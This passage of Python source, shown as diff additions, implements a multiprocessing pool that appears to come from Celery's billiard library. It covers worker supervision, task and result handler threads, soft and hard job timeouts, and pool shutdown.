receive + + +# +# Class representing a process pool +# + + +class PoolThread(DummyProcess): + + def __init__(self, *args, **kwargs): + DummyProcess.__init__(self) + self._state = RUN + self._was_started = False + self.daemon = True + + def run(self): + try: + return self.body() + except RestartFreqExceeded as exc: + error("Thread %r crashed: %r", type(self).__name__, exc, + exc_info=1) + _kill(os.getpid(), TERM_SIGNAL) + sys.exit() + except Exception as exc: + error("Thread %r crashed: %r", type(self).__name__, exc, + exc_info=1) + os._exit(1) + + def start(self, *args, **kwargs): + self._was_started = True + super(PoolThread, self).start(*args, **kwargs) + + def on_stop_not_started(self): + pass + + def stop(self, timeout=None): + if self._was_started: + self.join(timeout) + return + self.on_stop_not_started() + + def terminate(self): + self._state = TERMINATE + + def close(self): + self._state = CLOSE + + +class Supervisor(PoolThread): + + def __init__(self, pool): + self.pool = pool + super().__init__() + + def body(self): + debug('worker handler starting') + + time.sleep(0.8) + + pool = self.pool + + try: + # do a burst at startup to verify that we can start + # our pool processes, and in that time we lower + # the max restart frequency. 
+ prev_state = pool.restart_state + pool.restart_state = restart_state(10 * pool._processes, 1) + for _ in range(10): + if self._state == RUN and pool._state == RUN: + pool._maintain_pool() + time.sleep(0.1) + + # Keep maintaining workers until the cache gets drained, unless + # the pool is terminated + pool.restart_state = prev_state + while self._state == RUN and pool._state == RUN: + pool._maintain_pool() + time.sleep(0.8) + except RestartFreqExceeded: + pool.close() + pool.join() + raise + debug('worker handler exiting') + + +class TaskHandler(PoolThread): + + def __init__(self, taskqueue, put, outqueue, pool, cache): + self.taskqueue = taskqueue + self.put = put + self.outqueue = outqueue + self.pool = pool + self.cache = cache + super().__init__() + + def body(self): + cache = self.cache + taskqueue = self.taskqueue + put = self.put + + for taskseq, set_length in iter(taskqueue.get, None): + task = None + i = -1 + try: + for i, task in enumerate(taskseq): + if self._state: + debug('task handler found thread._state != RUN') + break + try: + put(task) + except IOError: + debug('could not put task on queue') + break + except Exception: + job, ind = task[:2] + try: + cache[job]._set(ind, (False, ExceptionInfo())) + except KeyError: + pass + else: + if set_length: + debug('doing set_length()') + set_length(i + 1) + continue + break + except Exception: + job, ind = task[:2] if task else (0, 0) + if job in cache: + cache[job]._set(ind + 1, (False, ExceptionInfo())) + if set_length: + util.debug('doing set_length()') + set_length(i + 1) + else: + debug('task handler got sentinel') + + self.tell_others() + + def tell_others(self): + outqueue = self.outqueue + put = self.put + pool = self.pool + + try: + # tell result handler to finish when cache is empty + debug('task handler sending sentinel to result handler') + outqueue.put(None) + + # tell workers there is no more work + debug('task handler sending sentinel to workers') + for p in pool: + put(None) + except IOError: + debug('task handler got IOError when sending sentinels') + + debug('task handler exiting') + + def on_stop_not_started(self): + self.tell_others() + + +class TimeoutHandler(PoolThread): + + def __init__(self, processes, cache, t_soft, t_hard): + self.processes = processes + self.cache = cache + self.t_soft = t_soft + self.t_hard = t_hard + self._it = None + super().__init__() + + def _process_by_pid(self, pid): + return next(( + (proc, i) for i, proc in enumerate(self.processes) + if proc.pid == pid + ), (None, None)) + + def on_soft_timeout(self, job): + debug('soft time limit exceeded for %r', job) + process, _index = self._process_by_pid(job._worker_pid) + if not process: + return + + # Run timeout callback + job.handle_timeout(soft=True) + + try: + _kill(job._worker_pid, SIG_SOFT_TIMEOUT) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + + def on_hard_timeout(self, job): + if job.ready(): + return + debug('hard time limit exceeded for %r', job) + # Remove from cache and set return value to an exception + try: + raise TimeLimitExceeded(job._timeout) + except TimeLimitExceeded: + job._set(job._job, (False, ExceptionInfo())) + else: # pragma: no cover + pass + + # Remove from _pool + process, _index = self._process_by_pid(job._worker_pid) + + # Run timeout callback + job.handle_timeout(soft=False) + + if process: + self._trywaitkill(process) + + def _trywaitkill(self, worker): + debug('timeout: sending TERM to %s', worker._name) + try: + if os.getpgid(worker.pid) == worker.pid: + debug("worker %s is a 
group leader. It is safe to kill (SIGTERM) the whole group", worker.pid) + os.killpg(os.getpgid(worker.pid), signal.SIGTERM) + else: + worker.terminate() + except OSError: + pass + else: + if worker._popen.wait(timeout=0.1): + return + debug('timeout: TERM timed-out, now sending KILL to %s', worker._name) + try: + if os.getpgid(worker.pid) == worker.pid: + debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid) + os.killpg(os.getpgid(worker.pid), signal.SIGKILL) + else: + _kill(worker.pid, SIGKILL) + except OSError: + pass + + def handle_timeouts(self): + t_hard, t_soft = self.t_hard, self.t_soft + dirty = set() + on_soft_timeout = self.on_soft_timeout + on_hard_timeout = self.on_hard_timeout + + def _timed_out(start, timeout): + if not start or not timeout: + return False + if monotonic() >= start + timeout: + return True + + # Inner-loop + while self._state == RUN: + # Perform a shallow copy before iteration because keys can change. + # A deep copy fails (on shutdown) due to thread.lock objects. + # https://github.com/celery/billiard/issues/260 + cache = copy.copy(self.cache) + + # Remove dirty items not in cache anymore + if dirty: + dirty = set(k for k in dirty if k in cache) + + for i, job in cache.items(): + ack_time = job._time_accepted + soft_timeout = job._soft_timeout + if soft_timeout is None: + soft_timeout = t_soft + hard_timeout = job._timeout + if hard_timeout is None: + hard_timeout = t_hard + if _timed_out(ack_time, hard_timeout): + on_hard_timeout(job) + elif i not in dirty and _timed_out(ack_time, soft_timeout): + on_soft_timeout(job) + dirty.add(i) + yield + + def body(self): + while self._state == RUN: + try: + for _ in self.handle_timeouts(): + time.sleep(1.0) # don't spin + except CoroStop: + break + debug('timeout handler exiting') + + def handle_event(self, *args): + if self._it is None: + self._it = self.handle_timeouts() + try: + next(self._it) + except StopIteration: + self._it = None + + +class ResultHandler(PoolThread): + + def __init__(self, outqueue, get, cache, poll, + join_exited_workers, putlock, restart_state, + check_timeouts, on_job_ready, on_ready_counters=None): + self.outqueue = outqueue + self.get = get + self.cache = cache + self.poll = poll + self.join_exited_workers = join_exited_workers + self.putlock = putlock + self.restart_state = restart_state + self._it = None + self._shutdown_complete = False + self.check_timeouts = check_timeouts + self.on_job_ready = on_job_ready + self.on_ready_counters = on_ready_counters + self._make_methods() + super().__init__() + + def on_stop_not_started(self): + # used when pool started without result handler thread. + self.finish_at_shutdown(handle_timeouts=True) + + def _make_methods(self): + cache = self.cache + putlock = self.putlock + restart_state = self.restart_state + on_job_ready = self.on_job_ready + + def on_ack(job, i, time_accepted, pid, synqW_fd): + restart_state.R = 0 + try: + cache[job]._ack(i, time_accepted, pid, synqW_fd) + except (KeyError, AttributeError): + # Object gone or doesn't support _ack (e.g. IMAPIterator). 
+ pass + + def on_ready(job, i, obj, inqW_fd): + if on_job_ready is not None: + on_job_ready(job, i, obj, inqW_fd) + try: + item = cache[job] + except KeyError: + return + + if self.on_ready_counters: + worker_pid = next(iter(item.worker_pids()), None) + if worker_pid and worker_pid in self.on_ready_counters: + on_ready_counter = self.on_ready_counters[worker_pid] + with on_ready_counter.get_lock(): + on_ready_counter.value += 1 + + if not item.ready(): + if putlock is not None: + putlock.release() + try: + item._set(i, obj) + except KeyError: + pass + + def on_death(pid, exitcode): + try: + os.kill(pid, TERM_SIGNAL) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + + state_handlers = self.state_handlers = { + ACK: on_ack, READY: on_ready, DEATH: on_death + } + + def on_state_change(task): + state, args = task + try: + state_handlers[state](*args) + except KeyError: + debug("Unknown job state: %s (args=%s)", state, args) + self.on_state_change = on_state_change + + def _process_result(self, timeout=1.0): + poll = self.poll + on_state_change = self.on_state_change + + while 1: + try: + ready, task = poll(timeout) + except (IOError, EOFError) as exc: + debug('result handler got %r -- exiting', exc) + raise CoroStop() + + if self._state: + assert self._state == TERMINATE + debug('result handler found thread._state=TERMINATE') + raise CoroStop() + + if ready: + if task is None: + debug('result handler got sentinel') + raise CoroStop() + on_state_change(task) + if timeout != 0: # blocking + break + else: + break + yield + + def handle_event(self, fileno=None, events=None): + if self._state == RUN: + if self._it is None: + self._it = self._process_result(0) # non-blocking + try: + next(self._it) + except (StopIteration, CoroStop): + self._it = None + + def body(self): + debug('result handler starting') + try: + while self._state == RUN: + try: + for _ in self._process_result(1.0): # blocking + pass + except CoroStop: + break + finally: + self.finish_at_shutdown() + + def finish_at_shutdown(self, handle_timeouts=False): + self._shutdown_complete = True + get = self.get + outqueue = self.outqueue + cache = self.cache + poll = self.poll + join_exited_workers = self.join_exited_workers + check_timeouts = self.check_timeouts + on_state_change = self.on_state_change + + time_terminate = None + while cache and self._state != TERMINATE: + if check_timeouts is not None: + check_timeouts() + try: + ready, task = poll(1.0) + except (IOError, EOFError) as exc: + debug('result handler got %r -- exiting', exc) + return + + if ready: + if task is None: + debug('result handler ignoring extra sentinel') + continue + + on_state_change(task) + try: + join_exited_workers(shutdown=True) + except WorkersJoined: + now = monotonic() + if not time_terminate: + time_terminate = now + else: + if now - time_terminate > 5.0: + debug('result handler exiting: timed out') + break + debug('result handler: all workers terminated, ' + 'timeout in %ss', + abs(min(now - time_terminate - 5.0, 0))) + + if hasattr(outqueue, '_reader'): + debug('ensuring that outqueue is not full') + # If we don't make room available in outqueue then + # attempts to add the sentinel (None) to outqueue may + # block. There is guaranteed to be no more than 2 sentinels. 
+ try: + for i in range(10): + if not outqueue._reader.poll(): + break + get() + except (IOError, EOFError): + pass + + debug('result handler exiting: len(cache)=%s, thread._state=%s', + len(cache), self._state) + + +class Pool: + ''' + Class which supports an async version of applying functions to arguments. + ''' + _wrap_exception = True + Worker = Worker + Supervisor = Supervisor + TaskHandler = TaskHandler + TimeoutHandler = TimeoutHandler + ResultHandler = ResultHandler + SoftTimeLimitExceeded = SoftTimeLimitExceeded + + def __init__(self, processes=None, initializer=None, initargs=(), + maxtasksperchild=None, timeout=None, soft_timeout=None, + lost_worker_timeout=None, + max_restarts=None, max_restart_freq=1, + on_process_up=None, + on_process_down=None, + on_timeout_set=None, + on_timeout_cancel=None, + threads=True, + semaphore=None, + putlocks=False, + allow_restart=False, + synack=False, + on_process_exit=None, + context=None, + max_memory_per_child=None, + enable_timeouts=False, + **kwargs): + self._ctx = context or get_context() + self.synack = synack + self._setup_queues() + self._taskqueue = Queue() + self._cache = {} + self._state = RUN + self.timeout = timeout + self.soft_timeout = soft_timeout + self._maxtasksperchild = maxtasksperchild + self._max_memory_per_child = max_memory_per_child + self._initializer = initializer + self._initargs = initargs + self._on_process_exit = on_process_exit + self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT + self.on_process_up = on_process_up + self.on_process_down = on_process_down + self.on_timeout_set = on_timeout_set + self.on_timeout_cancel = on_timeout_cancel + self.threads = threads + self.readers = {} + self.allow_restart = allow_restart + + self.enable_timeouts = bool( + enable_timeouts or + self.timeout is not None or + self.soft_timeout is not None + ) + + if soft_timeout and SIG_SOFT_TIMEOUT is None: + warnings.warn(UserWarning( + "Soft timeouts are not supported: " + "on this platform: It does not have the SIGUSR1 signal.", + )) + soft_timeout = None + + self._processes = self.cpu_count() if processes is None else processes + self.max_restarts = max_restarts or round(self._processes * 100) + self.restart_state = restart_state(max_restarts, max_restart_freq or 1) + + if initializer is not None and not callable(initializer): + raise TypeError('initializer must be a callable') + + if on_process_exit is not None and not callable(on_process_exit): + raise TypeError('on_process_exit must be callable') + + self._Process = self._ctx.Process + + self._pool = [] + self._poolctrl = {} + self._on_ready_counters = {} + self.putlocks = putlocks + self._putlock = semaphore or LaxBoundedSemaphore(self._processes) + for i in range(self._processes): + self._create_worker_process(i) + + self._worker_handler = self.Supervisor(self) + if threads: + self._worker_handler.start() + + self._task_handler = self.TaskHandler(self._taskqueue, + self._quick_put, + self._outqueue, + self._pool, + self._cache) + if threads: + self._task_handler.start() + + self.check_timeouts = None + + # Thread killing timedout jobs. + if self.enable_timeouts: + self._timeout_handler = self.TimeoutHandler( + self._pool, self._cache, + self.soft_timeout, self.timeout, + ) + self._timeout_handler_mutex = Lock() + self._timeout_handler_started = False + self._start_timeout_handler() + # If running without threads, we need to check for timeouts + # while waiting for unfinished work at shutdown. 
+ if not threads: + self.check_timeouts = self._timeout_handler.handle_event + else: + self._timeout_handler = None + self._timeout_handler_started = False + self._timeout_handler_mutex = None + + # Thread processing results in the outqueue. + self._result_handler = self.create_result_handler() + self.handle_result_event = self._result_handler.handle_event + + if threads: + self._result_handler.start() + + self._terminate = Finalize( + self, self._terminate_pool, + args=(self._taskqueue, self._inqueue, self._outqueue, + self._pool, self._worker_handler, self._task_handler, + self._result_handler, self._cache, + self._timeout_handler, + self._help_stuff_finish_args()), + exitpriority=15, + ) + + def Process(self, *args, **kwds): + return self._Process(*args, **kwds) + + def WorkerProcess(self, worker): + return worker.contribute_to_object(self.Process(target=worker)) + + def create_result_handler(self, **extra_kwargs): + return self.ResultHandler( + self._outqueue, self._quick_get, self._cache, + self._poll_result, self._join_exited_workers, + self._putlock, self.restart_state, self.check_timeouts, + self.on_job_ready, on_ready_counters=self._on_ready_counters, + **extra_kwargs + ) + + def on_job_ready(self, job, i, obj, inqW_fd): + pass + + def _help_stuff_finish_args(self): + return self._inqueue, self._task_handler, self._pool + + def cpu_count(self): + try: + return cpu_count() + except NotImplementedError: + return 1 + + def handle_result_event(self, *args): + return self._result_handler.handle_event(*args) + + def _process_register_queues(self, worker, queues): + pass + + def _process_by_pid(self, pid): + return next(( + (proc, i) for i, proc in enumerate(self._pool) + if proc.pid == pid + ), (None, None)) + + def get_process_queues(self): + return self._inqueue, self._outqueue, None + + def _create_worker_process(self, i): + sentinel = self._ctx.Event() if self.allow_restart else None + inq, outq, synq = self.get_process_queues() + on_ready_counter = self._ctx.Value('i') + w = self.WorkerProcess(self.Worker( + inq, outq, synq, self._initializer, self._initargs, + self._maxtasksperchild, sentinel, self._on_process_exit, + # Need to handle all signals if using the ipc semaphore, + # to make sure the semaphore is released. + sigprotection=self.threads, + wrap_exception=self._wrap_exception, + max_memory_per_child=self._max_memory_per_child, + on_ready_counter=on_ready_counter, + )) + self._pool.append(w) + self._process_register_queues(w, (inq, outq, synq)) + w.name = w.name.replace('Process', 'PoolWorker') + w.daemon = True + w.index = i + w.start() + self._poolctrl[w.pid] = sentinel + self._on_ready_counters[w.pid] = on_ready_counter + if self.on_process_up: + self.on_process_up(w) + return w + + def process_flush_queues(self, worker): + pass + + def _join_exited_workers(self, shutdown=False): + """Cleanup after any worker processes which have exited due to + reaching their specified lifetime. Returns True if any workers were + cleaned up. + """ + now = None + # The worker may have published a result before being terminated, + # but we have no way to accurately tell if it did. So we wait for + # _lost_worker_timeout seconds before we mark the job with + # WorkerLostError. 
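+        # A sketch of the bookkeeping assumed here: on_job_process_lost()
+        # (below) stamps the job with
+        #
+        #     job._worker_lost = (monotonic(), exitcode)
+        #
+        # and the loop that follows only marks a job with WorkerLostError
+        # once that stamp is older than job._lost_worker_timeout seconds.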
+ for job in [job for job in list(self._cache.values()) + if not job.ready() and job._worker_lost]: + now = now or monotonic() + lost_time, lost_ret = job._worker_lost + if now - lost_time > job._lost_worker_timeout: + self.mark_as_worker_lost(job, lost_ret) + + if shutdown and not len(self._pool): + raise WorkersJoined() + + cleaned, exitcodes = {}, {} + for i in reversed(range(len(self._pool))): + worker = self._pool[i] + exitcode = worker.exitcode + popen = worker._popen + if popen is None or exitcode is not None: + # worker exited + debug('Supervisor: cleaning up worker %d', i) + if popen is not None: + worker.join() + debug('Supervisor: worked %d joined', i) + cleaned[worker.pid] = worker + exitcodes[worker.pid] = exitcode + if exitcode not in (EX_OK, EX_RECYCLE) and \ + not getattr(worker, '_controlled_termination', False): + error( + 'Process %r pid:%r exited with %r', + worker.name, worker.pid, human_status(exitcode), + exc_info=0, + ) + self.process_flush_queues(worker) + del self._pool[i] + del self._poolctrl[worker.pid] + del self._on_ready_counters[worker.pid] + if cleaned: + all_pids = [w.pid for w in self._pool] + for job in list(self._cache.values()): + acked_by_gone = next( + (pid for pid in job.worker_pids() + if pid in cleaned or pid not in all_pids), + None + ) + # already accepted by process + if acked_by_gone: + self.on_job_process_down(job, acked_by_gone) + if not job.ready(): + exitcode = exitcodes.get(acked_by_gone) or 0 + proc = cleaned.get(acked_by_gone) + if proc and getattr(proc, '_job_terminated', False): + job._set_terminated(exitcode) + else: + self.on_job_process_lost( + job, acked_by_gone, exitcode, + ) + else: + # started writing to + write_to = job._write_to + # was scheduled to write to + sched_for = job._scheduled_for + + if write_to and not write_to._is_alive(): + self.on_job_process_down(job, write_to.pid) + elif sched_for and not sched_for._is_alive(): + self.on_job_process_down(job, sched_for.pid) + + for worker in cleaned.values(): + if self.on_process_down: + if not shutdown: + self._process_cleanup_queues(worker) + self.on_process_down(worker) + return list(exitcodes.values()) + return [] + + def on_partial_read(self, job, worker): + pass + + def _process_cleanup_queues(self, worker): + pass + + def on_job_process_down(self, job, pid_gone): + pass + + def on_job_process_lost(self, job, pid, exitcode): + job._worker_lost = (monotonic(), exitcode) + + def mark_as_worker_lost(self, job, exitcode): + try: + raise WorkerLostError( + 'Worker exited prematurely: {0} Job: {1}.'.format( + human_status(exitcode), job._job), + ) + except WorkerLostError: + job._set(None, (False, ExceptionInfo())) + else: # pragma: no cover + pass + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + return self.terminate() + + def on_grow(self, n): + pass + + def on_shrink(self, n): + pass + + def shrink(self, n=1): + for i, worker in enumerate(self._iterinactive()): + self._processes -= 1 + if self._putlock: + self._putlock.shrink() + worker.terminate_controlled() + self.on_shrink(1) + if i >= n - 1: + break + else: + raise ValueError("Can't shrink pool. 
All processes busy!") + + def grow(self, n=1): + for i in range(n): + self._processes += 1 + if self._putlock: + self._putlock.grow() + self.on_grow(n) + + def _iterinactive(self): + for worker in self._pool: + if not self._worker_active(worker): + yield worker + + def _worker_active(self, worker): + for job in self._cache.values(): + if worker.pid in job.worker_pids(): + return True + return False + + def _repopulate_pool(self, exitcodes): + """Bring the number of pool processes up to the specified number, + for use after reaping workers which have exited. + """ + for i in range(self._processes - len(self._pool)): + if self._state != RUN: + return + try: + if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE): + self.restart_state.step() + except IndexError: + self.restart_state.step() + self._create_worker_process(self._avail_index()) + debug('added worker') + + def _avail_index(self): + assert len(self._pool) < self._processes + indices = set(p.index for p in self._pool) + return next(i for i in range(self._processes) if i not in indices) + + def did_start_ok(self): + return not self._join_exited_workers() + + def _maintain_pool(self): + """"Clean up any exited workers and start replacements for them. + """ + joined = self._join_exited_workers() + self._repopulate_pool(joined) + for i in range(len(joined)): + if self._putlock is not None: + self._putlock.release() + + def maintain_pool(self): + if self._worker_handler._state == RUN and self._state == RUN: + try: + self._maintain_pool() + except RestartFreqExceeded: + self.close() + self.join() + raise + except OSError as exc: + if get_errno(exc) == errno.ENOMEM: + raise MemoryError from exc + raise + + def _setup_queues(self): + self._inqueue = self._ctx.SimpleQueue() + self._outqueue = self._ctx.SimpleQueue() + self._quick_put = self._inqueue._writer.send + self._quick_get = self._outqueue._reader.recv + + def _poll_result(timeout): + if self._outqueue._reader.poll(timeout): + return True, self._quick_get() + return False, None + self._poll_result = _poll_result + + def _start_timeout_handler(self): + # ensure more than one thread does not start the timeout handler + # thread at once. + if self.threads and self._timeout_handler is not None: + with self._timeout_handler_mutex: + if not self._timeout_handler_started: + self._timeout_handler_started = True + self._timeout_handler.start() + + def apply(self, func, args=(), kwds={}): + ''' + Equivalent of `func(*args, **kwargs)`. + ''' + if self._state == RUN: + return self.apply_async(func, args, kwds).get() + + def starmap(self, func, iterable, chunksize=None): + ''' + Like `map()` method but the elements of the `iterable` are expected to + be iterables as well and will be unpacked as arguments. Hence + `func` and (a, b) becomes func(a, b). + ''' + if self._state == RUN: + return self._map_async(func, iterable, + starmapstar, chunksize).get() + + def starmap_async(self, func, iterable, chunksize=None, + callback=None, error_callback=None): + ''' + Asynchronous version of `starmap()` method. + ''' + if self._state == RUN: + return self._map_async(func, iterable, starmapstar, chunksize, + callback, error_callback) + + def map(self, func, iterable, chunksize=None): + ''' + Apply `func` to each element in `iterable`, collecting the results + in a list that is returned. 
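+
+        A minimal usage sketch (the built-in ``abs`` is used only so the
+        callable can be pickled under any start method):
+
+            >>> with Pool(processes=2) as pool:
+            ...     pool.map(abs, range(-2, 3))
+            [2, 1, 0, 1, 2]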
+ ''' + if self._state == RUN: + return self.map_async(func, iterable, chunksize).get() + + def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None): + ''' + Equivalent of `map()` -- can be MUCH slower than `Pool.map()`. + ''' + if self._state != RUN: + return + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if chunksize == 1: + result = IMapIterator(self._cache, + lost_worker_timeout=lost_worker_timeout) + self._taskqueue.put(( + ((TASK, (result._job, i, func, (x,), {})) + for i, x in enumerate(iterable)), + result._set_length, + )) + return result + else: + assert chunksize > 1 + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = IMapIterator(self._cache, + lost_worker_timeout=lost_worker_timeout) + self._taskqueue.put(( + ((TASK, (result._job, i, mapstar, (x,), {})) + for i, x in enumerate(task_batches)), + result._set_length, + )) + return (item for chunk in result for item in chunk) + + def imap_unordered(self, func, iterable, chunksize=1, + lost_worker_timeout=None): + ''' + Like `imap()` method but ordering of results is arbitrary. + ''' + if self._state != RUN: + return + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if chunksize == 1: + result = IMapUnorderedIterator( + self._cache, lost_worker_timeout=lost_worker_timeout, + ) + self._taskqueue.put(( + ((TASK, (result._job, i, func, (x,), {})) + for i, x in enumerate(iterable)), + result._set_length, + )) + return result + else: + assert chunksize > 1 + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = IMapUnorderedIterator( + self._cache, lost_worker_timeout=lost_worker_timeout, + ) + self._taskqueue.put(( + ((TASK, (result._job, i, mapstar, (x,), {})) + for i, x in enumerate(task_batches)), + result._set_length, + )) + return (item for chunk in result for item in chunk) + + def apply_async(self, func, args=(), kwds={}, + callback=None, error_callback=None, accept_callback=None, + timeout_callback=None, waitforslot=None, + soft_timeout=None, timeout=None, lost_worker_timeout=None, + callbacks_propagate=(), + correlation_id=None): + ''' + Asynchronous equivalent of `apply()` method. + + Callback is called when the functions return value is ready. + The accept callback is called when the job is accepted to be executed. + + Simplified the flow is like this: + + >>> def apply_async(func, args, kwds, callback, accept_callback): + ... if accept_callback: + ... accept_callback() + ... retval = func(*args, **kwds) + ... if callback: + ... 
callback(retval) + + ''' + if self._state != RUN: + return + soft_timeout = soft_timeout or self.soft_timeout + timeout = timeout or self.timeout + lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout + if soft_timeout and SIG_SOFT_TIMEOUT is None: + warnings.warn(UserWarning( + "Soft timeouts are not supported: " + "on this platform: It does not have the SIGUSR1 signal.", + )) + soft_timeout = None + if self._state == RUN: + waitforslot = self.putlocks if waitforslot is None else waitforslot + if waitforslot and self._putlock is not None: + self._putlock.acquire() + result = ApplyResult( + self._cache, callback, accept_callback, timeout_callback, + error_callback, soft_timeout, timeout, lost_worker_timeout, + on_timeout_set=self.on_timeout_set, + on_timeout_cancel=self.on_timeout_cancel, + callbacks_propagate=callbacks_propagate, + send_ack=self.send_ack if self.synack else None, + correlation_id=correlation_id, + ) + if timeout or soft_timeout: + # start the timeout handler thread when required. + self._start_timeout_handler() + if self.threads: + self._taskqueue.put(([(TASK, (result._job, None, + func, args, kwds))], None)) + else: + self._quick_put((TASK, (result._job, None, func, args, kwds))) + return result + + def send_ack(self, response, job, i, fd): + pass + + def terminate_job(self, pid, sig=None): + proc, _ = self._process_by_pid(pid) + if proc is not None: + try: + _kill(pid, sig or TERM_SIGNAL) + except OSError as exc: + if get_errno(exc) != errno.ESRCH: + raise + else: + proc._controlled_termination = True + proc._job_terminated = True + + def map_async(self, func, iterable, chunksize=None, + callback=None, error_callback=None): + ''' + Asynchronous equivalent of `map()` method. + ''' + return self._map_async( + func, iterable, mapstar, chunksize, callback, error_callback, + ) + + def _map_async(self, func, iterable, mapper, chunksize=None, + callback=None, error_callback=None): + ''' + Helper function to implement map, starmap and their async counterparts. 
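+
+        For example, with the default calculation below, a 1000-item
+        iterable on a 4-process pool gives ``divmod(1000, 4 * 4) == (62, 8)``,
+        so ``chunksize`` is rounded up to 63 and the work is dispatched as
+        16 batches, the last one holding the remaining 55 items.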
+ ''' + if self._state != RUN: + return + if not hasattr(iterable, '__len__'): + iterable = list(iterable) + + if chunksize is None: + chunksize, extra = divmod(len(iterable), len(self._pool) * 4) + if extra: + chunksize += 1 + if len(iterable) == 0: + chunksize = 0 + + task_batches = Pool._get_tasks(func, iterable, chunksize) + result = MapResult(self._cache, chunksize, len(iterable), callback, + error_callback=error_callback) + self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {})) + for i, x in enumerate(task_batches)), None)) + return result + + @staticmethod + def _get_tasks(func, it, size): + it = iter(it) + while 1: + x = tuple(itertools.islice(it, size)) + if not x: + return + yield (func, x) + + def __reduce__(self): + raise NotImplementedError( + 'pool objects cannot be passed between processes or pickled', + ) + + def close(self): + debug('closing pool') + if self._state == RUN: + self._state = CLOSE + if self._putlock: + self._putlock.clear() + self._worker_handler.close() + self._taskqueue.put(None) + stop_if_not_current(self._worker_handler) + + def terminate(self): + debug('terminating pool') + self._state = TERMINATE + self._worker_handler.terminate() + self._terminate() + + @staticmethod + def _stop_task_handler(task_handler): + stop_if_not_current(task_handler) + + def join(self): + assert self._state in (CLOSE, TERMINATE) + debug('joining worker handler') + stop_if_not_current(self._worker_handler) + debug('joining task handler') + self._stop_task_handler(self._task_handler) + debug('joining result handler') + stop_if_not_current(self._result_handler) + debug('result handler joined') + for i, p in enumerate(self._pool): + debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p) + if p._popen is not None: # process started? 
+ p.join() + debug('pool join complete') + + def restart(self): + for e in self._poolctrl.values(): + e.set() + + @staticmethod + def _help_stuff_finish(inqueue, task_handler, _pool): + # task_handler may be blocked trying to put items on inqueue + debug('removing tasks from inqueue until task handler finished') + inqueue._rlock.acquire() + while task_handler.is_alive() and inqueue._reader.poll(): + inqueue._reader.recv() + time.sleep(0) + + @classmethod + def _set_result_sentinel(cls, outqueue, pool): + outqueue.put(None) + + @classmethod + def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool, + worker_handler, task_handler, + result_handler, cache, timeout_handler, + help_stuff_finish_args): + + # this is guaranteed to only be called once + debug('finalizing pool') + + worker_handler.terminate() + + task_handler.terminate() + taskqueue.put(None) # sentinel + + debug('helping task handler/workers to finish') + cls._help_stuff_finish(*help_stuff_finish_args) + + result_handler.terminate() + cls._set_result_sentinel(outqueue, pool) + + if timeout_handler is not None: + timeout_handler.terminate() + + # Terminate workers which haven't already finished + if pool and hasattr(pool[0], 'terminate'): + debug('terminating workers') + for p in pool: + if p._is_alive(): + p.terminate() + + debug('joining task handler') + cls._stop_task_handler(task_handler) + + debug('joining result handler') + result_handler.stop() + + if timeout_handler is not None: + debug('joining timeout handler') + timeout_handler.stop(TIMEOUT_MAX) + + if pool and hasattr(pool[0], 'terminate'): + debug('joining pool workers') + for p in pool: + if p.is_alive(): + # worker has not yet exited + debug('cleaning up worker %d', p.pid) + if p._popen is not None: + p.join() + debug('pool workers joined') + + if inqueue: + inqueue.close() + if outqueue: + outqueue.close() + + @property + def process_sentinels(self): + return [w._popen.sentinel for w in self._pool] + +# +# Class whose instances are returned by `Pool.apply_async()` +# + + +class ApplyResult: + _worker_lost = None + _write_to = None + _scheduled_for = None + + def __init__(self, cache, callback, accept_callback=None, + timeout_callback=None, error_callback=None, soft_timeout=None, + timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT, + on_timeout_set=None, on_timeout_cancel=None, + callbacks_propagate=(), send_ack=None, + correlation_id=None): + self.correlation_id = correlation_id + self._mutex = Lock() + self._event = threading.Event() + self._job = next(job_counter) + self._cache = cache + self._callback = callback + self._accept_callback = accept_callback + self._error_callback = error_callback + self._timeout_callback = timeout_callback + self._timeout = timeout + self._soft_timeout = soft_timeout + self._lost_worker_timeout = lost_worker_timeout + self._on_timeout_set = on_timeout_set + self._on_timeout_cancel = on_timeout_cancel + self._callbacks_propagate = callbacks_propagate or () + self._send_ack = send_ack + + self._accepted = False + self._cancelled = False + self._worker_pid = None + self._time_accepted = None + self._terminated = None + cache[self._job] = self + + def __repr__(self): + return '<%s: {id} ack:{ack} ready:{ready}>'.format( + self.__class__.__name__, + id=self._job, ack=self._accepted, ready=self.ready(), + ) + + def ready(self): + return self._event.is_set() + + def accepted(self): + return self._accepted + + def successful(self): + assert self.ready() + return self._success + + def _cancel(self): + """Only works if synack is 
used.""" + self._cancelled = True + + def discard(self): + self._cache.pop(self._job, None) + + def terminate(self, signum): + self._terminated = signum + + def _set_terminated(self, signum=None): + try: + raise Terminated(-(signum or 0)) + except Terminated: + self._set(None, (False, ExceptionInfo())) + + def worker_pids(self): + return [self._worker_pid] if self._worker_pid else [] + + def wait(self, timeout=None): + self._event.wait(timeout) + + def get(self, timeout=None): + self.wait(timeout) + if not self.ready(): + raise TimeoutError + if self._success: + return self._value + else: + raise self._value.exception + + def safe_apply_callback(self, fun, *args, **kwargs): + if fun: + try: + fun(*args, **kwargs) + except self._callbacks_propagate: + raise + except Exception as exc: + error('Pool callback raised exception: %r', exc, + exc_info=1) + + def handle_timeout(self, soft=False): + if self._timeout_callback is not None: + self.safe_apply_callback( + self._timeout_callback, soft=soft, + timeout=self._soft_timeout if soft else self._timeout, + ) + + def _set(self, i, obj): + with self._mutex: + if self._on_timeout_cancel: + self._on_timeout_cancel(self) + self._success, self._value = obj + self._event.set() + if self._accepted: + # if not accepted yet, then the set message + # was received before the ack, which means + # the ack will remove the entry. + self._cache.pop(self._job, None) + + # apply callbacks last + if self._callback and self._success: + self.safe_apply_callback( + self._callback, self._value) + if (self._value is not None and + self._error_callback and not self._success): + self.safe_apply_callback( + self._error_callback, 